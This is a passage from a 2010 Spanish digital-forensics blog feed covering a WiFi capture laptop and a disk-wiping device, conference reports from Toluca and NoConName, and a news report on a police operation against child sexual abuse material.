IP, intensidad de la señal, fabricante, MAC) &lt;/li&gt;&lt;li&gt;Proporciona la captura de paquetes WLAN de un solo canal, AP STA, o de múltiples canales mediante la implementación de distribución / sistemas múltiples.  &lt;/li&gt;&lt;li&gt;Proporciona descifrado de claves wi-fi, la clave WEP (LLeva un módulo WPA de pago)&lt;/li&gt;&lt;li&gt;Proporciona decodificación y la reconstrucción de los servicios de Internet diferentes y protocolos mostrando los datos reconstruidos de forma gráfica &lt;/li&gt;&lt;li&gt;Permite grabar en archivo los datos capturados (para su posterior análisis en caso necesario) &lt;/li&gt;&lt;li&gt;Proporciona la función de localización de equipos inalámbricos&lt;/li&gt;&lt;/ul&gt;&amp;nbsp;Básicamente es un software que viene integrado en un portátil de la marca Lenovo con una antena extensible y una tarjeta wifi especifica en modo promiscuo .&lt;br /&gt;&lt;br /&gt;&lt;b&gt;BORRADO SEGURO&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Si quieres eliminar tus datos de empresa de forma segura disponemos de una unidad especial de borrado de  discos duros llamada &lt;strong&gt;Drive eRazer&lt;/strong&gt;. El Drive  eRazer se conecta a un disco duro y este hace todo el trabajo de  borrado. Borra el  disco a razón de 35 MB/s, mucho más rápido que hacerlo por software y por su puesto sobreescribe en ceros, muy empleado por el ejercito de los EEUU y por nosotros mismos cuando queremos 'destruir' un disco.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TOJdUgR28aI/AAAAAAAACXg/wDQ3TQYebGk/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="224" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TOJdUgR28aI/AAAAAAAACXg/wDQ3TQYebGk/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;Tengo más juguetitos, pero estos son quizás los mas espectaculares...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-1081866501784792940?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/1081866501784792940/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=1081866501784792940' title='8 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1081866501784792940'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1081866501784792940'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/11/hardware-forensics.html' title='Hardware Forensics'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_7dOLVYBL8vA/TOEX9AGoMOI/AAAAAAAACW4/-8z18bGHp_A/s72-c/Captura.JPG' height='72' width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-4120494382012353202</id><published>2010-10-28T13:49:00.001+02:00</published><updated>2010-10-28T13:51:37.985+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ponencias'/><category scheme='http://www.blogger.com/atom/ns#' term='Cursos'/><category scheme='http://www.blogger.com/atom/ns#' term='eventos'/><title type='text'>Estamos en el Simposium Internacional en Toluca, México</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TMlf0H0ApxI/AAAAAAAACU4/PVTjfgRyzZA/s1600/logosimposium.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="49" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TMlf0H0ApxI/AAAAAAAACU4/PVTjfgRyzZA/s320/logosimposium.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Ayer Miercoles comenzó el XVI Simposium Internacional en Toluca, México. En estos días que estamos quiero destacar la impresionante gestión que están realizando los organizadores, que supera a otras que he estado en Europa y Asia, es de lo mejor que he visto.&lt;br /&gt;&lt;br /&gt;Toluca es un bonito pueblo de gente sencilla y humilde, en estos días se celebra el "día de los muertos" y aquí en México la gente lo disfruta de lo lindo, todo es un ambiente festivo.&lt;br /&gt;&lt;br /&gt;Ayer día 27 las conferencias programadas fuerón:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Leobardo Hernandez&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;Aplicaciones de la criptografia a la seguridad (no tuve ocasión de "platicar" con el)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Marcelo Rivero&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;Virus de antes, Malwares de hoy (Marcelo es un crack, menuda conferencia que dío)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Yo mismo&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;Análisis forense en una fuga de datos (Menudo show monte, &lt;b&gt;¿que pasa wey?&lt;/b&gt;)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Diego Ferreiro&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;Seguridad Web 2.0&amp;nbsp; (Este es un puto crack, como persona y como amigo, menuda calidad humana, tengo un post solo para el)&lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;/ol&gt;&lt;br /&gt;El día fué más o menos así:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TMlcgR0Bt5I/AAAAAAAACUw/SjTG8gjBYsc/s1600/pueblo_toluca.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TMlcgR0Bt5I/AAAAAAAACUw/SjTG8gjBYsc/s320/pueblo_toluca.JPG" width="289" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&amp;nbsp;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Vista de la Plaza de Toluca&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TMlX-TUAfjI/AAAAAAAACUU/HYZhpighjmw/s1600/teatro.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TMlX-TUAfjI/AAAAAAAACUU/HYZhpighjmw/s400/teatro.JPG" width="302" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;LLegada al teatro donde se organiza el evento&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TMlYdYxo97I/AAAAAAAACUY/3CFsUCbWp4g/s1600/diego.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="235" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TMlYdYxo97I/AAAAAAAACUY/3CFsUCbWp4g/s320/diego.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Diego y su universidad de la coruña ¿polo de ConexiónInversa? ESTO ES INCREIBLE&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TMlagof9cVI/AAAAAAAACUo/-TDgVKE-Uus/s1600/marcelo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="247" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TMlagof9cVI/AAAAAAAACUo/-TDgVKE-Uus/s320/marcelo.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&amp;nbsp;Marcelo y su &lt;a href="http://www.infospyware.com/" style="color: #0b5394;"&gt;InfoSpyware&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TMlbG9W737I/AAAAAAAACUs/vRR53IgLGCI/s1600/Ponentes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="228" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TMlbG9W737I/AAAAAAAACUs/vRR53IgLGCI/s320/Ponentes.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Los tres IM ponentes&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TMlZLB1GHUI/AAAAAAAACUg/hA99d9ReGqY/s1600/desdearriba.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TMlZLB1GHUI/AAAAAAAACUg/hA99d9ReGqY/s320/desdearriba.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&amp;nbsp;Esto empieza a llenarse (600 asistentes)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;Luego se celebró una mesa redonda, en la que discutimos de todo y despues unos tequilas para templar el cuerpo.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TMldC4xNskI/AAAAAAAACU0/b-uM8M13yEM/s1600/tequilas.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="168" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TMldC4xNskI/AAAAAAAACU0/b-uM8M13yEM/s320/tequilas.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;También quiero dar las gracias a los asistentes ya que fueron muy amables y muy entregados tanto en las conferencias como en la ronda de preguntas, gracias por pasar un buen rato con nosotros.&lt;br /&gt;&lt;br /&gt;Hoy toca ver al &lt;a href="http://www.elladodelmal.com/" style="color: #0b5394;"&gt;Maligno de Chema Alonso&lt;/a&gt; y me voy a la tarde con Diego para el congreso de la &lt;a href="http://www.bugcon.org/schedules2010" style="color: #0b5394;"&gt;BugCon&lt;/a&gt;. y luego de vuelta a Toluca que Diego tiene un training.&lt;br /&gt;&lt;br /&gt;Ya os mantengo informados.&lt;br /&gt;&lt;br /&gt;Saludos lectores...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-4120494382012353202?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/4120494382012353202/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=4120494382012353202' title='11 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/4120494382012353202'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/4120494382012353202'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/10/estamos-en-el-simposium-internacional.html' title='Estamos en el Simposium Internacional en Toluca, México'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_7dOLVYBL8vA/TMlf0H0ApxI/AAAAAAAACU4/PVTjfgRyzZA/s72-c/logosimposium.JPG' height='72' width='72'/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-1964996291520526232</id><published>2010-10-11T22:46:00.001+02:00</published><updated>2010-10-11T22:56:28.287+02:00</updated><title type='text'>Nos vamos a la Noconname!!</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://noconname.org/images/logoNcN.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="93" src="http://noconname.org/images/logoNcN.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;&lt;div&gt;Voy de ponente a la NcN y me he dejado 'engañar' `por Nico para ser parte del jurado en dos concursos, a los cuales os incito a participar.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Uno se llama "Iluminación de Randa" y es un &lt;u&gt;concurso Multidisciplina&lt;/u&gt;r en el que los participantes deberán demostrar la habilidad para dar una solución a un problema de carácter real creado para la ocasión.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;El otro es (como no) &lt;u&gt;un reto forense&lt;/u&gt; y consiste en un juego para el que es necesario aplicar diversas técnicas comúnmente usadas para el análisis forense de sistemas. Se proporciona a los participantes la imágen de una partición de disco para que estos la analicen y expongan todo lo que encuentren en ella.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://noconname.org/" style="color: #0b5394;"&gt;&lt;b&gt;NOCONNAME&lt;/b&gt;&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;Es la asociación con más antigüedad en España, dedicada a la congregación anual de expertos en seguridad informática en el campo de la investigación. Creo recordar que fue en el año 2002 cuando&amp;nbsp;empece a ir&amp;nbsp;a las charlas en Palma de Mallorca, (menudos fiestones nos preparaba Nico.)&lt;br /&gt;&lt;br /&gt;Nico, es el "alma mater" de este congreso, es un 'tipo' decidido, de esos que se comprometen, que le dedican tiempo y alma en algo que cree. Es el investigador por excelencia, es el amigo que siempre te dice '¿pues claro y por que no? . Es joven, audaz y sabe bailar salsa (es el primer tio que conozco que le gusta eso ;-) )&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Este año se retoma la actividad&amp;nbsp;después&amp;nbsp;de cuatro años sin actividad para volver con más fuerza que nunca con un montón de gente conocida.&lt;br /&gt;&lt;br /&gt;Entre ellos encontraréis a , "&lt;a href="http://www.elladodelmal.com/"&gt;El maligno Chema Alonso&lt;/a&gt;", mi compadre &lt;a href="http://windowstips.wordpress.com/"&gt;Juanito&lt;/a&gt;, el supermaño&amp;nbsp; &lt;a href="http://www.securitybydefault.com/"&gt;Yago&lt;/a&gt;, el onmipresente &lt;a href="http://www.securitybydefault.com/"&gt;Alejandro Ramos &lt;/a&gt;y muchos más.... &lt;/div&gt;&lt;div&gt;&lt;br /&gt;Espero veros a todos(as) y tomar unas cervezas, cafés, cocalocas y&amp;nbsp; demás..., estar y simplemente compartir...&lt;br /&gt;&lt;br /&gt;Para los que queráís empezar en esto de la seguridad, este es vuestro sitio.&lt;br /&gt;&lt;br /&gt;PD: Sorpresa para aelita&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-1964996291520526232?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/1964996291520526232/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=1964996291520526232' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1964996291520526232'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1964996291520526232'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/10/nos-vamos-la-noconname.html' title='Nos vamos a la Noconname!!'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-6922412055922580940</id><published>2010-10-08T12:53:00.004+02:00</published><updated>2010-10-08T13:12:13.822+02:00</updated><title type='text'>¡¡ Muy bien por la BIT !!</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TK740HeFwBI/AAAAAAAACUM/1p6nDxolqL0/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="131" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TK740HeFwBI/AAAAAAAACUM/1p6nDxolqL0/s200/Captura.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Un centenar de detenidos e imputados por pornografía infantil&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Más de un centenar de personas, dos de ellas de Aragón, han sido detenidas o imputadas en una redada llevada a cabo por la Policía Nacional contra la pornografía infantil desarrollada en toda España.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;En concreto, en la operación se han detenido a 57 personas (once de ellas han pasado a disposición judicial) e imputado a otras 47, según ha informado hoy la Dirección General de la Policía y la Guardia Civil, que ha precisado que han participado 400 agentes, que han practicado 97 registros en toda España con la intervención de más de 70 juzgados de guardia y secretarios judiciales.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;b&gt;"Uno de los detenidos es un productor de material pornográfico infantil que, además de poseer y distribuir archivos de este tipo, había grabado imágenes de dos familiares menores -de siete y catorce años- en actitud sexual.&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;b&gt;Unas imágenes que tenía almacenadas, en soportes informáticos que contenían otros vídeos pedófilos de extrema dureza, esta persona de profesión jardinero y con un nivel alto de conocimientos informáticos, que ha pasado a disposición judicial tras prestar declaración&lt;/b&gt;.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;"&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Entre los implicados, de los cuales uno está domiciliado en Teruel y otro en Zaragoza, hay además policías locales, ingenieros informáticos, directores de empresa, estudiantes, desempleados, pizzeros o caldereros.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Los policías, pertenecientes a 36 plantillas del Cuerpo, &lt;b&gt;coordinados por la Brigada de Investigación Tecnológica (BIT)&lt;/b&gt;, han intervenido 328 discos duros, 40 ordenadores portátiles, 21 CPU's, 2 notebook, centenares de dvd's y cd's, 13 pendrives y 8 tarjetas de memoria.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Para escudriñar la red e identificar a los usuarios que compartiesen y por lo tanto distribuyeran archivos a través de las redes de intercambio 'peer to peer', los agentes utilizaron por primera vez el software NordicMule, desarrollado por el Servicio Nacional de Investigación Criminal de Noruega (NCIS).&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Este sofisticado programa permite realizar las descargas sin compartir el contenido de los archivos descargados, seleccionar el país en el que se ubican los usuarios investigados y además visualizar de modo gráfico la información relativa a usuarios que están compartiendo en ese momento los archivos investigados.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Tras la solicitud de descarga, el programa crea automáticamente una tabla en la que quedan reflejados todos los datos necesarios para llevar a cabo la identificación de los usuarios investigados.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Con las posibilidades de esta herramienta, los policías introdujeron en la aplicación 857 enlaces "p2p", correspondientes a vídeos de contenido ilícito y obtenidos &lt;b&gt;gracias a la colaboración ciudadana mediante denuncias de particulares en Comisarías.&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, 